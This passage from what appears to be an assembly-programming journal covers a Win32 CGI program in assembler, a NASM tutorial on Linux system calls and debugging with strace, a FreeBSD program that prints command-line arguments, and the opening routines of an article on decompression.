mov ax, [Time.wSecond]
mov edi, HTML.Time_S + 7
call .ascii
cld ;Win32 API calls expect the direction flag clear
ret
;***-----------------------[Local Subroutine]----------------------***
.ascii:
std ;String OPs Right to Left
cmp ax, 10 ;Single Digit?
jl .onex10
and ah, ah ;Only Two Digits
jz .twox16
mov bh, 10 ;Reduce 3x16 to 2x16
div bh ; so that AAM can be used
or ah, 0x30 ;BCD -> ASCII
mov [edi], ah
dec edi
.twox16:
aam ; AL / 10 = AH r AL
or al, 0x30 ;BCD -> ASCII
stosb
mov al, ah
cmp ah, 9
jg .twox16
.onex10:
or al, 0x30
stosb ;Copy Last/Only Digit to Mem
ret
;***--------------------[Data used by this App]--------------------***
section '.data' data readable writeable
StdIn dd 0 ;Standard I/O Handles
StdOut dd 0
HTML:
db 'Content-type: text/html', Cr, Lf, Cr, Lf
db '<html><head><title>Hello World</title></head>', Cr, Lf
db '<body bgcolor=Black text=Cyan><h1>Hello World</h1>', Cr, Lf
db '<h2><font color=Lime>', Cr, Lf
db 'This HTML is dynamically generated by a PE console Application written in '
db '80x86 Assembler</font></h2>', Cr, Lf
db '<h2><font color=Red>It is: </font><font color=Blue>'
.Day_S db 'WkD '
.Date_S db ' 0/00/0000</font> <font color=Magenta>'
.Time_S db ' 0:00:00 AM</font> <font color=Lime>UTC</font></h2>', Cr, Lf
db '</body></html>', Cr, Lf
HTML._size = $ - HTML - 1
HTML.Len dd 0 ;Number of bytes actually written
Time SYSTEMTIME
Day.Wk db 'SunMonTueWedThuFriSat'
;***----------------------[Import Table / IAT]---------------------***
section '.idata' import data readable writeable
library kernel, 'KERNEL32.DLL'
kernel:
import GetModuleHandle, 'GetModuleHandleA',\
GetCommandLine, 'GetCommandLineA',\
GetSystemTime, 'GetSystemTime',\
GetEnvVar, 'GetEnvironmentVariableA',\
GetStdHandle, 'GetStdHandle',\
CreateFile, 'CreateFileA',\
ReadFile, 'ReadFile',\
WriteFile, 'WriteFile',\
CloseHandle, 'CloseHandle',\
ExitProcess, 'ExitProcess'
__________________|||-------------------[/code]-------------------|||
How to Run
----------
You can run this example from the command line since it requires no client
data. You can also redirect the output into an HTML document and open it
with IE:
Main > Text.html
For the real CGI, place Main.exe into the cgi-bin directory, launch Apache,
and type "localhost/cgi-bin/Main.exe" in the address box of IE.
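For comparison, here is a minimal sketch of the same reply in Python rather
than assembler. It is only an illustration: the function name cgi_response
and the trimmed-down HTML are assumptions of this sketch, not part of
Main.exe. It shows the two things the listing does: emit the Content-type
header followed by an empty line, and drop the UTC date and time into
fixed-width slots.

```python
import time

DAYS = "SunMonTueWedThuFriSat"  # same packed table as Day.Wk, 3 bytes per day


def cgi_response(t):
    """Build the CGI reply for a UTC time given as a time.struct_time."""
    # struct_time counts Monday as 0; SYSTEMTIME.wDayOfWeek counts Sunday as 0.
    dow = (t.tm_wday + 1) % 7
    day = DAYS[dow * 3:dow * 3 + 3]
    hour, suffix = t.tm_hour, "AM"
    if hour >= 12:
        suffix = "PM"
        if hour > 12:
            hour -= 12
    body = (
        "<html><head><title>Hello World</title></head>\r\n"
        "<body><h1>Hello World</h1>\r\n"
        f"<h2>It is: {day} {t.tm_mon:2d}/{t.tm_mday:02d}/{t.tm_year:04d} "
        f"{hour:2d}:{t.tm_min:02d}:{t.tm_sec:02d} {suffix} UTC</h2>\r\n"
        "</body></html>\r\n"
    )
    # A CGI reply is a header block, one empty line, then the document.
    return "Content-type: text/html\r\n\r\n" + body


print(cgi_response(time.gmtime()), end="")
```

The web server reads everything up to the empty line as headers and passes
the rest to the browser, which is why the header and the blank line have to
come first.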
References
----------
SAMS Teach Yourself CGI in 24 Hours
SAMS 2000 $24.99US
Rafe Colburn ISBN: 0-672-31880-6
CGI by Example
QUE 1996 $34.99US
Robert Niles & Jeffry Dwight ISBN: 0-7897-0877-9
HTML in Plain English - 2nd Edition
MIS Press 1998 $19.95US
Sandra E. Eddy ISBN: 1-55828-587-3
Cascading Style Sheets - The Definitive Guide
O'Reilly 2000 $34.95US
Eric A. Meyer ISBN: 1-56592-622-6
Win32 Programming Reference (Win32 API Help file)
Microsoft 1990-1995 Free
http://win32asm.rxsp.com/files/win32api.zip
Contact
-------
eet_1024@...
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::............................................THE.UNIX.WORLD
Writing A Useful Program With NASM
by Jonathan Leto
Intro
-----
Much fun can be had with assembly programming, and it gives you a much
deeper understanding of the inner workings of your processor and kernel.
This article is geared towards the beginning assembly programmer who can't
seem to justify why he is doing something as masochistic as writing an
entire program in assembly language. If you don't already know one or more
other programming languages, you really have no business reading this. Many
constructs will also be explained in terms of C. You should also be familiar
with the command line options of NASM; there is no sense going over them
again here.
Getting Started
---------------
So you want to write a program that actually DOES something. "Hello, world"
isn't cutting it anymore. First, an overview of the various parts of an
assembly program: (For terse documentation, the NASM manual is the place to
go.)
The .data section
-----------------
This section is for initialized data that the program treats as constants,
such as filenames or buffer sizes; the values are fixed at assembly time.
The NASM documentation has a good description of how to use the db, dd, etc.
pseudo-instructions that are used in this section.
The .bss section
----------------
This section is where you declare your variables.
They look something like this:
filename: resb 255 ; REServe 255 Bytes
number: resb 1 ; REServe 1 Byte
bignum: resw 1 ; REServe 1 Word (1 Word = 2 Bytes)
longnum: resd 1 ; REServe 1 Double Word
pi: resq 1 ; REServe 1 double precision float
morepi: rest 1 ; REServe 1 extended precision float
The .text section
-----------------
This is where the actual assembly code is written. The term "self modifying
code" means a program which modifies this section while being executed.
In The Beginning ...
--------------------
The next thing you probably noticed while looking at the source of various
assembly programs is that there always seems to be "global _start" or
something similar at the beginning of the .text section. This is the
assembly program's way of telling the linker, and through it the kernel,
where program execution begins. It is, to my knowledge, just like the main
function in C, except that it is not a function, just a starting point.
The Stack and Stuff
-------------------
Also like in C, the kernel sets up the environment with all of the
environment variables, and sets up **argv and argc. Just in case you forgot,
**argv is an array of strings that are all of the arguments given to the
program, and argc is the count of how many there are. These are all put on
the stack. If you have taken Computer Science 101, or read any type of
introductory computer science book, you should know what a stack is. It is a
way of storing data so that the last thing you put in is the first that
comes out. This is fine and dandy, but most people don't seem to grasp how
this has anything to do with their computer. "The stack", as it is ominously
referred to, is just your RAM. That's it. It is your RAM organized in such a
way that when you "push" something onto "The stack", all you are doing is
saving something in RAM. And when you "pop" something off of "The stack",
you are retrieving the last thing you put in, which is on the top.
Ok, now let's look at some code that you are likely to see.
section .text ; declaring our .text segment
global _start ; telling where program execution should start
_start: ; this is where code starts getting exec'ed
pop ebx ; get first thing off of stack and put into ebx
dec ebx ; decrement the value of ebx by one
pop ebp ; get next 2 things off stack and put into ebp
pop ebp
What does this code do? It puts the number of real arguments into the ebx
register and the first actual argument into ebp. Let's say we ran the
program on the command line as so:
$ ./program 42 A
When we are at the _start label, the stack looks something like this:
-----------
| 3 | The number of arguments, including argv[0],
| | which is the program name
-----------
|"program"| argv[0]
-----------
| "42" | argv[1] NOTE: This is the character "4" and "2",
| | not the number 42
-----------
| "A" | argv[2]
-----------
So, the first instruction, "pop ebx", took the 3, and put it into ebx.
Then we decrement it by one, because the program name isn't really an
argument. Depending on whether the argument count is needed later on, you
will see the following arguments popped into either the same register or a
different one.
Now, "pop ebp" puts the program name into ebp, and then the next "pop ebp"
overwrites it, and puts "42" into ebp. (Strictly speaking, each slot holds a
pointer to the string, not the string itself.) The previous value of ebp is
not preserved, and since you have popped it off of the stack, it is gone
forever.
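The pops can be followed on paper with a small Python model. This is only a
sketch: start_stack is a made-up helper, and the list holds the strings
themselves, whereas the real stack holds pointers to them.

```python
def start_stack(command_line):
    """Model the initial stack for a command line (top of stack first)."""
    argv = command_line.split()
    return [len(argv)] + argv


stack = start_stack("./program 42 A")

ebx = stack.pop(0)   # pop ebx : argc, including the program name
ebx -= 1             # dec ebx : number of real arguments
ebp = stack.pop(0)   # pop ebp : argv[0], the program name
ebp = stack.pop(0)   # pop ebp : argv[1], overwriting argv[0]

print(ebx, repr(ebp), stack)
```

Whatever is still in the list after the pops is what a further "pop" would
return next.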
Doing more interesting things
-----------------------------
Moving on, how exactly do you interact with the rest of the system? You know
how to manipulate the stack, but how do you get the current time, or make a
directory, or fork a process, or any other wonderful thing a Unix box can
do? I am pleased to introduce you to the "system call". A system call is the
translator that lets user-land programs (which is what you are writing) talk
to the kernel, which is in kernel-land, of course. Each syscall has a unique
number, so that you can put it into the eax register, and tell the kernel
"Yo, wake up and do this", and it hopefully will. If the syscall takes
arguments, which most do, these go into ebx, ecx, edx, esi, edi, ebp, in
that order (this is the Linux convention).
Some example code always helps:
mov eax,1 ; the exit syscall number
mov ebx,0 ; have an exit code of 0
int 80h ; interrupt 80h, the thing that pokes the
; kernel and says, "do this"
The preceding code is equivalent to having a "return 0" at the end of your
main function. Ok, ok, still not very useful, but we are getting there.
A more useful example:
pop ebx ; argc
pop ebx ; argv[0]
pop ebx ; the first real arg, a filename
mov eax,5 ; the syscall number for open()
; we already have the filename in ebx
mov ecx,0 ; O_RDONLY, defined in fcntl.h
int 80h ; call the kernel
; now we have a file descriptor in eax
test eax,eax ; lets make sure it is valid
jns file_function ; if the sign flag is not set, eax is not
; negative, so it is a valid file descriptor:
; jump to file_function
mov ebx,eax ; there was an error, save the (negative) errno in ebx
mov eax,1 ; put the exit syscall number in eax
int 80h ; bail out
Now we are starting to get somewhere. You should be starting to realize that
there is no black magic or voodoo in assembly programming, just a very
strict set of rules. If you know how the rules work, you can do just about
anything. Though I haven't tried it, I have seen network coding in assembly,
console graphics ( intros! ), and yes, even X windows code in assembly.
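Since constructs are being explained in terms of higher-level languages, the
open-and-check step can be sketched in Python too. open_readonly is a
hypothetical helper name; os.open and os.O_RDONLY are Python's standard
wrappers around open(). Python raises an exception instead of returning a
negative number, so the sketch converts it back to the -errno form that the
raw Linux syscall leaves in eax.

```python
import errno
import os


def open_readonly(path):
    """Return a file descriptor for path, or a negative errno on failure."""
    try:
        return os.open(path, os.O_RDONLY)
    except OSError as e:
        # Same convention as the raw syscall: failure is reported as -errno.
        return -e.errno


fd = open_readonly("/no/such/file")
if fd < 0:                                  # the "js" branch in the assembly
    print("open failed:", errno.errorcode[-fd])
else:
    os.close(fd)
```

The sign test is the whole error check, just as "test eax,eax" followed by
"jns" is in the assembly version.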
So where do you find out all of the semantics for all of the various system
calls? Well first, the numbers are listed in asm/unistd.h in Linux, and
sys/syscall.h in the *BSD's. To find out information about each one, such as
what arguments they take and what values they return, look no further than
your man pages! I will hold your hand in finding out about the next syscall
we are going to use, read().
"man read" didn't give you exactly what you wanted, did it? That is because
program manuals and shell manuals are shown before the programming manuals
are. If you are using bash, you probably are looking at the BASH_BUILTINS(1)
man page. To get to what you really want, try "man 2 read". Now you should
be looking at sections like SYNOPSIS, DESCRIPTION, RETURN VALUE, ERRORS and
a few others. These are the most important. Take a look at the synopsis, it
should look like:
ssize_t read(int fd, void *buf, size_t count);
NOTE: ssize_t and size_t are just integers.
The first argument is the file descriptor, followed by the buffer, and then
how many bytes to read in, which should be however long the buffer is. A
count of 8192, which is 8k, is a sensible choice, and a buffer of exactly
that size is fine. Now you know what to put in your registers. Reading the
RETURN VALUE section, you should see how read() returns the number of bytes
it read, 0 for EOF, and -1 for errors. (The raw system call reports an error
as a negative number in eax, which is why the code below tests the sign
flag.)
file_function:
mov ebx,eax ; sys_open returned file descriptor into eax
mov eax,3 ; sys_read
; ebx is already setup
mov ecx,buf ; we are putting the ADDRESS of buf in ecx
mov edx,bufsize ; the VALUE of bufsize, i.e. the byte count
; (assumes bufsize is an equ constant, not a label)
int 80h ; call the kernel
test eax,eax ; see what got returned
jz nextfile ; got an EOF, go to read the next file
js error ; got an error, bail out
; if we are here, then we actually read some
; bytes
Now we have a chunk of the file read ( up to 8192 bytes ), and sitting in
what you would call an array in C. What can you do now? Well, the first
thing that comes to mind is print it out. Wait a sec, there is no man page
for printf in section 2. What's the deal? Well, printf is a library
function, implemented by good ol' libc. You are going to have to dig a
little deeper, and use write(). So now you are looking at the man page.
write() writes to a file descriptor. What the hell good does that do me? I
want to print it out! Well, remember, everything in Unix is a file, so all
you have to do is write to STDOUT. In /usr/include/unistd.h, it is defined
as 1. So the next chunk of code looks like:
mov edx,eax ; save the count of bytes for the write syscall
mov eax,4 ; system call for write
mov ebx,1 ; STDOUT file descriptor
; ecx is already set up
int 80h ; call kernel
; for the program to properly exit instead of segfaulting right here
; ( it doesn't seem to like to fall off the end of a program ), call
; a sys_exit
mov eax,1
mov ebx,0
int 80h
What you have now just written is basically "cat", except it only prints the
first 8192 bytes.
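The 8192-byte limit goes away once the read/write pair is put in a loop. The
sketch below does that with Python's thin wrappers around the same system
calls (os.open, os.read, os.write, os.close). The name cat and the BUFSIZE
constant belong to this sketch only; treat it as an outline of the loop you
would write in assembly, not as the asmutils implementation.

```python
import os

BUFSIZE = 8192  # same count the article passes to read()


def cat(path, out_fd=1):
    """Copy a whole file to out_fd using only open/read/write/close."""
    fd = os.open(path, os.O_RDONLY)
    total = 0
    try:
        while True:
            chunk = os.read(fd, BUFSIZE)    # read(): up to BUFSIZE bytes
            if not chunk:                   # nothing returned means EOF
                break
            view = memoryview(chunk)
            while view:                     # write() may take fewer bytes
                n = os.write(out_fd, view)  # than asked for, so repeat
                view = view[n:]
            total += len(chunk)
    finally:
        os.close(fd)
    return total
```

In assembly the outer loop is a jump back to the read after each write, with
the "jz" on the return value of read as the way out.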
Portability
-----------
In the preceding section, you saw how to call the kernel in Linux with NASM.
This is fine if you are never ever going to use another operating system,
and you enjoy looking up the system call numbers, but it is not very
practical, and extremely unportable. What to do? There is a great little
package called asmutils started by Konstantin Boldyshev, who runs
http://www.linuxassembly.org. If you haven't read all of the good
documentation on that site, that should be your next step. Asmutils provides
an easy to use and portable interface for doing system calls in whichever
Unix variant you use ( and even has support for BeOS.) Even if you aren't
interested in using these Unix utilities that are rewritten in assembly, if
you want to write portable NASM code, you are better off using its header
files than rolling your own. With asmutils, your code will look like this:
%include "system.inc" ; all the magic happens here
CODESEG ; .text section
START: ; always starts here
sys_write STDOUT,[somestring],[strlen]
END ; code ends here
This is much more readable than doing everything by system call number, and
it will be portable across Linux, FreeBSD, OpenBSD, NetBSD, BeOS and a few
other lesser known OS's. You can now use system calls by name, and use
standard constants like STDOUT or O_RDONLY, just like in C. The "%include"
statement works much like #include does in C, pulling in the contents of
that file.
To learn more about how to use asmutils, read the Asmutils-HOWTO, which is
in the doc/ directory of the source. Also, to get the latest source, use the
following commands:
export CVS_RSH=ssh
cvs -d:pserver:anonymous@...:/cvsroot/asm login
cvs -z3 -d:pserver:anonymous@...:/cvsroot/asm co asmutils
This will download the newest, bleeding edge source into a subdirectory
called "asmutils" of your current directory. Take a look at some of the
simpler programs, such as cat, sleep, ln, head or mount, and you will see
that there isn't anything horrendously difficult about them. head was my
first assembly program, and I made extra comments on purpose, so that would
be a good place to start.
Debugging
---------
Strace will definitely be your friend. It is the easiest tool to use to
debug your problem. Most of the time when writing in assembly, other than
syntax errors, you will just get a segmentation fault. This provides you
with ZERO useful information. With strace, at least you will see after which
system call your program is choking. Example:
$ strace ./cal2
execve("./cal2", ["./cal2"], [/* 46 vars */]) = 0
read(1, "", 0) = 0
--- SIGSEGV (Segmentation fault) ---
+++ killed by SIGSEGV +++
Now you know to look after your first read system call. But it starts
getting tricky when you have lots of pure assembly, which strace cannot
show. That's when gdb comes into play. There is some very good information
about using gdb and enabling debugging information in NASM in the
Asmutils-HOWTO, so I won't reproduce it here. For a quick and dirty
solution, you could do something like this:
%define notdeadyet sys_write STDOUT,0,__LINE__
Now you can litter the source with notdeadyet's, and hopefully see where
things are going astray with the help of strace. Obviously this is not
practical for complex bugs or voluminous source, but works great for finding
careless mistakes when you are starting out. Example:
$ strace ./cal2
execve("./cal2", ["./cal2"], [/* 46 vars */]) = 0
write(1, NULL, 16) = 16
write(1, NULL, 26) = 26
write(1, NULL, 41) = 41
--- SIGSEGV (Segmentation fault) ---
+++ killed by SIGSEGV +++
Now we know that we are still going on line 41, and the problem is after
that.
Next ?
------
Now it is your turn to explore the insides of your operating system, and
take pride in understanding what's really going on under the covers.
Reference
---------
Places to get more information:
Linux Assembly - http://www.linuxassembly.org
NASM Manual ( available in doc/html directory of source )
Assembly Programming Journal - http://asmjournal.freeservers.com/
Mammon_'s textbase - http://www.eccentrica.org/Mammon/sprawl/textbase.html
Art Of Assembly - http://webster.cs.ucr.edu/Page_asm/ArtOfAsm.html
Sandpile - http://www.sandpile.org
comp.lang.asm.x86
NASM - http://www.cryogen.com/Nasm
Asmutils-HOWTO - doc/ directory of asmutils
Feedback
--------
Feedback is welcome, hopefully this was of some use to budding Unix assembly
programmers.
Availability
------------
The most current version of this document should be available at
http://www.leto.net/papers/writing-a-useful-program-with-nasm.txt .
Appendix : Jumps
----------------
When I first began looking at assembly source code, I saw all these crazy
instructions like "jnz" and the like. It looked like I was going to have to
remember the names of a whole slew of inanely named instructions. But after
a while it finally clicked what they all were. They are basically just the
"if statements" that you know and love, that work off of the EFLAGS
register. What is the EFLAGS register? Just a register with lots of
different bits that are set to zero or one, depending on the result of the
previous instruction, typically a comparison.
Some code to set the stage:
mov eax,82
mov ebx,69
cmp eax,ebx
jle some_function
What on earth is "jle"? Why, it's "Jump if Less than or Equal." If eax was
less than or equal to ebx, code execution will jump to "some_function"; if
not, it keeps chugging along. Here is a list which will hopefully shed some
light on this part of assembly that was mysterious to me when I began. Some
of these are logically the same, but are provided because in some situations
one will be more intuitive than the other.
Jump     Meaning                          Signedness (S or U)
-----------------------------------------------------------
ja     | Jump if above                  | U
jae    | Jump if above or Equal         | U
jb     | Jump if below                  | U
jbe    | Jump if below or Equal         | U
jc     | Jump if Carry                  |
jcxz   | Jump if CX is Zero             |
je     | Jump if Equal                  |
jecxz  | Jump if ECX is Zero            |
jg     | Jump if greater                | S
jge    | Jump if greater or Equal       | S
jl     | Jump if less                   | S
jle    | Jump if less or Equal          | S
jmp    | Unconditional jump             |
jna    | Jump if Not above              | U
jnae   | Jump if Not above or Equal     | U
jnb    | Jump if Not below              | U
jnbe   | Jump if Not below or Equal     | U
jnc    | Jump if Not Carry              |
jne    | Jump if Not Equal              |
jng    | Jump if Not greater            | S
jnge   | Jump if Not greater or Equal   | S
jnl    | Jump if Not less               | S
jnle   | Jump if Not less or Equal      | S
jno    | Jump if Not Overflow           |
jnp    | Jump if Not Parity             |
jns    | Jump if Not Sign (not negative)|
jnz    | Jump if Not Zero               |
jo     | Jump if Overflow               |
jp     | Jump if Parity                 |
jpe    | Jump if Parity Even            |
jpo    | Jump if Parity Odd             |
js     | Jump if Sign (negative)        |
jz     | Jump if Zero                   |
-----------------------------------------------------------
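The S and U columns matter as soon as the top bit of a register is set. The
following Python sketch models the flags left by "cmp a,b" on 32-bit
registers and evaluates a few of the jumps from the table. The function
names cmp_flags and taken are made up for the illustration; the flag
conditions are the ones documented for these instructions.

```python
def cmp_flags(a, b, bits=32):
    """Return (CF, ZF, SF, OF) as set by `cmp a, b` on bits-wide registers."""
    mask = (1 << bits) - 1
    sign = 1 << (bits - 1)
    a &= mask
    b &= mask
    r = (a - b) & mask
    cf = int(a < b)                             # unsigned borrow
    zf = int(r == 0)
    sf = int(bool(r & sign))
    of = int(bool((a ^ b) & (a ^ r) & sign))    # signed overflow of a - b
    return cf, zf, sf, of


def taken(jump, a, b):
    """Would `jump` be taken right after `cmp a, b`?"""
    cf, zf, sf, of = cmp_flags(a, b)
    conditions = {
        "ja": cf == 0 and zf == 0, "jae": cf == 0,
        "jb": cf == 1, "jbe": cf == 1 or zf == 1,
        "jg": zf == 0 and sf == of, "jge": sf == of,
        "jl": sf != of, "jle": zf == 1 or sf != of,
        "je": zf == 1, "jne": zf == 0,
    }
    return conditions[jump]


# 0FFFFFFFFh is 4294967295 when read as unsigned, but -1 when read as signed.
print(taken("ja", 0xFFFFFFFF, 1), taken("jg", 0xFFFFFFFF, 1))
```

The same bit pattern is "above" 1 but not "greater" than 1, which is the
whole difference between the U and the S jumps.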
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::............................................THE.UNIX.WORLD
Command Line in FreeBSD
by G. Adam Stanislav
In my Issue 8 article I mentioned I did not know how command line parameters
(or arguments) were passed to programs under FreeBSD. I have received some
feedback, both from the FreeBSD community and APJ readers.
Thanks to that feedback, I can now pass this information on to you. Further,
this information should be valid, more or less, for all 386 based Unix and
Unix-like operating systems. At any rate, if your Unix variety does not come
with the information on its command line parameters, chances are that, if
you adjust my sample code to use the kernel interface of your OS, it will
work just fine.
Code startup
------------
Unix is much more security-conscious than MS DOS and MS Windows. While
DOS/Windows assembly language programmers may be used to the operating
system loading their code and then CALLing it (so you can exit with a simple
RET, and possibly crash the system), Unix creates a new process for each
program. This process is separate from the kernel and from all other
processes. Hence, the system does not CALL your code, it JMPs to it. If you
issue a RET, you will crash your program, but Unix will continue running
unharmed. At least that's the theory. However, under FreeBSD it is the
practice as well: I tried it and can vouch for it.
The top of the stack
--------------------
Before the Unix system jumps to your code, it pushes some information on the
top of the stack: your stack, that is, not the system stack, so you can
access it all from your own code. Apart from the argument count, every entry
is a pointer to a NUL-terminated string (or a NULL pointer). Here is what
the stack contains, starting at the top:
number of arguments ("argc")
argument 0
argument 1
...
argument n (n = argc - 1)
NULL pointer
environment 0
environment 1
...
environment n
NULL pointer
Not all of these are necessarily there (e.g., if the program was called with
no arguments). However, the number of arguments, argument 0, and the two
NULL pointers are always present.
Argument 0 is not a command line parameter in the sense DOS programmers are
used to. Instead, it is the name of the program. C programmers will find it
as the familiar argv[0].
Another important difference between DOS and Unix is that DOS programs just
give you the full command line, i.e., whatever appears after the name of the
program, including any leading and trailing blanks. It is then up to the
programmer to strip all extra blanks.
Compared to that, parsing the Unix command line is much simpler as the
system (the shell, to be precise) does some of the hard work for you. The
individual arguments are separated, and usually contain no leading/trailing
blanks. When they do, they are there because the program caller wanted them
there.
Let me illustrate. Suppose the user has typed the following command:
./args Hello, world. Here I come!
In that case, the top of the stack will look like this:
6
./args
Hello,
world.
Here
I
come!
0
environment 0
environment 1
...
environment n
0
The arguments are nicely separated and contain no blanks. Now, suppose the
user has typed:
./args Hello, world. "Here I come!"
The top of the stack looks like this:
4
./args
Hello,
world.
Here I come!
0
(etc)
This system, besides making it easier to parse, has a great advantage over
the DOS way: It has no practical limit on the size of the command line (the
kernel does impose one, but it is far larger than the 127 characters DOS
allows).
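The splitting and quoting shown above is done by the shell before the
program starts. Python's shlex module follows roughly the same quoting rules
(without expanding variables or backquotes), so it can be used to sketch
what ends up on the stack. stack_for is a hypothetical helper, None stands
in for the NULL pointer, and the list holds strings where the real stack
holds pointers.

```python
import shlex


def stack_for(command_line):
    """Return [argc, argument 0, ..., argument n, NULL] for a command line."""
    argv = shlex.split(command_line)   # shell-style word splitting
    return [len(argv)] + argv + [None]


print(stack_for('./args Hello, world. Here I come!'))
print(stack_for('./args Hello, world. "Here I come!"'))
```

The quoted version yields a single argument with its blanks intact, which
is the "Here I come!" case from the second stack picture.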
Accessing the information
-------------------------
Because your program runs in its own process space, the stack is yours to do
with as you please. You can simply save the information in some data
structure and leave the stack intact, or you can pop it off as you need it.
The C startup code uses the first approach: It saves the "argc" value in a
local variable, the address of argument 0 in another. It finds the start of
the environment variable list and stores it in a global variable. It then
calls main, passing that information to it, i.e. main(argc, argv, env);
The assembly language program can do that as well, but usually has no need
to. If you process the command line at the start of your code, and never
need to see it again, you can just pop it off the stack one by one, analyze
it, set up any flags or other variables, etc.
I have enclosed a simple assembly language program called args.asm below.
All it does is print all the information the FreeBSD system has passed to
it. It is useful as an example of one way of accessing the command line
arguments (and the environment) by simply popping them off one at a time.
It is also useful as a tool to study what format the arguments are in. For
example, running it will show you that the environment is passed to your
program in the form of name=value, where name is the name of the environment
variable and value is whatever text string is assigned to it.
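Popping the stack until the first NULL, then until the second, can be
sketched in Python as follows. walk_stack is a made-up name, None stands in
for the NULL pointer, and strings stand in for the pointers the real stack
holds.

```python
def walk_stack(stack):
    """Split an initial stack image into (argc, arguments, environment)."""
    items = iter(stack)
    argc = next(items)              # top of the stack: number of arguments
    args = []
    for item in items:              # pop until the first NULL
        if item is None:
            break
        args.append(item)
    env = {}
    for item in items:              # keep popping until the second NULL
        if item is None:
            break
        name, _, value = item.partition("=")   # entries are name=value
        env[name] = value
    return argc, args, env


image = [2, "./args", "hi", None, "HOME=/root", "TERM=xterm", None]
print(walk_stack(image))
```

Note that argc is never needed to find the end of the arguments; the NULL
pointer does that job.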
You can assemble and link the program with NASM:
nasm -f elf args.asm
ld -o args args.o
strip args
Try running it with and without command line arguments. Try placing the
arguments in single and double quotes, try all the nifty things a Unix shell
will let you do, such as:
./args $HOME
./args `ls -la`
./args "`ls -la`"
./args '`ls -la`'
./args
./args Hello, world. Here I come!
./args Hello, world. "Here I come!"
./args ' Hello, world. Here I come ! '
;-----------------------------------------------------------------------------;
; args.asm
;
; Print FreeBSD command line arguments and environment
;
; Copyright 2000 G. Adam Stanislav
; All rights reserved
;-----------------------------------------------------------------------------;
section .data
prgmsg db 'Program name:', 0Ah, 0Ah
tab db 9
prglen equ $-prgmsg
argmsg db 0Ah, 0Ah, 'Command line arguments:', 0Ah, 0Ah
arglen equ $-argmsg
envmsg db 0Ah, 'Environment variables:', 0Ah, 0Ah
envlen equ $-envmsg
huhmsg db "Hmmm... Something's wrong here...", 0Ah
huhlen equ $-huhmsg
section .text
what.the.heck:
; Print the huhmsg to stderr and abort.
push dword huhlen
push dword huhmsg
sub eax, eax
mov al, 2 ; stderr
push eax
add al, al ; SYS_write
push eax
int 80h
; No need to clean up the stack since we're quitting now.
sub eax, eax
inc al ; return 1 (failure), SYS_exit
push eax
push eax
int 80h
; ELF programs always start at _start
global _start
_start:
; We come here with "argc" on the top of the stack. Its value
; is at least 1. If not, something went seriously wrong.
pop ecx ; ECX = argc
jecxz what.the.heck
; Print the prgmsg
sub eax, eax
push dword prglen
push dword prgmsg
inc al ; stdout
push eax
push eax
mov al, 4 ;SYS_write
int 80h
add esp, byte 16
; Get argv[0], i.e., the program path
pop ebx ; EBX = argv[0]
; argv[0] is a NUL-terminated string. We can find its
; length by scanning for the NUL.
sub eax, eax
sub ecx, ecx
cld
dec ecx
mov edi, ebx
repne scasb
not ecx
dec ecx
; Print the string
push ecx
push ebx
inc al ; stdout
push eax
push eax
mov al, 4
int 80h
add esp, byte 16
; Print the argmsg
sub eax, eax
push dword arglen
push dword argmsg
inc al ; stdout
push eax
push eax
mov al, 4 ; SYS_write
int 80h
add esp, byte 16
; By now, we have no idea what the value of argc was.
; We did not save it because we don't need it.
; The top of the stack now contains pointers
; to command line arguments (if any), followed
; by a NULL pointer.
;
; We simply print everything before the NULL.
.argloop:
pop ebx ; next argument
or ebx, ebx
je .env ; NULL pointer
; Print a tab
sub eax, eax
inc al
push eax
push dword tab
push eax ; stdout
mov al, 4 ; SYS_write
push eax
int 80h
add esp, byte 16
; Find the length
sub ecx, ecx
sub eax, eax
dec ecx
mov edi, ebx
repne scasb
not ecx
; Append a new line
mov byte [edi-1], 0Ah
; Print the string
push ecx
push ebx
inc al ; stdout
push eax
mov al, 4 ; SYS_write
push eax
int 80h
add esp, byte 16
jmp short .argloop ; next
.env:
; Print the envmsg
sub eax, eax
push dword envlen
push dword envmsg
inc al ; stdout
push eax
push eax
mov al, 4 ; SYS_write
int 80h
add esp, byte 16
; The top of the stack now contains pointers to
; environment variables, followed by a NULL pointer.
; We do what we did for the arguments:
.envloop:
pop ebx
or ebx, ebx
je .exit
sub eax, eax
inc al
push eax
push dword tab
push eax
mov al, 4
push eax
int 80h
add esp, byte 16
sub ecx, ecx
sub eax, eax
dec ecx
mov edi, ebx
repne scasb
not ecx
mov byte [edi-1], 0Ah
push ecx
push ebx
inc al
push eax
mov al, 4
push eax
int 80h
add esp, byte 16
jmp short .envloop
.exit:
sub eax, eax ; return 0 (success)
push eax
inc al ; SYS_exit
push eax
int 80h
;--- End of program ----------------------------------------------------------;
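The length calculation in the listing (dec ecx / repne scasb / not ecx) is
terse, so here is a Python model of it, assuming 32-bit wrap-around
arithmetic. scasb_strlen is a hypothetical name; it returns both the length
without the NUL (what the argv[0] code prints) and the count including the
NUL (what the loops print after overwriting the NUL with a new line).

```python
MASK = 0xFFFFFFFF


def scasb_strlen(memory, start):
    """Model of: sub ecx,ecx / dec ecx / repne scasb / not ecx / dec ecx."""
    ecx = (0 - 1) & MASK            # dec ecx   -> 0FFFFFFFFh, "no limit"
    edi = start
    while ecx != 0:                 # repne scasb with AL = 0
        byte = memory[edi]
        edi += 1                    # cld: EDI moves upwards
        ecx = (ecx - 1) & MASK
        if byte == 0:               # found the NUL: stop scanning
            break
    with_nul = ~ecx & MASK          # not ecx   -> bytes scanned, NUL included
    without_nul = (with_nul - 1) & MASK   # dec ecx -> the string length
    return without_nul, with_nul


print(scasb_strlen(b"./args\x00", 0))
```

Starting ECX at -1 and inverting it afterwards turns "how far did the
counter run down" into "how many bytes were scanned" without a separate
counter register.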
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::............................................THE.UNIX.WORLD
Compressing data
by Feryno Gabris
First, an introduction to decompression. It needs a routine called
"get_next_bit". Here are 3 examples:
;-----
get_next_bit:
add dl,dl
jnz no_new_byte
lodsb
mov dl,al
adc dl,dl
no_new_byte:
ret
;-----
get_next_bit:
shl bx,1
jnz no_new_word
mov bx,word [esi]
inc esi
inc esi
rcl bx,1
no_new_word:
ret
;-----
get_next_bit:
shl ebp,1
jnz no_new_dword
lodsd
rcl eax,1
xchg ebp,eax
no_new_dword:
ret
;-----
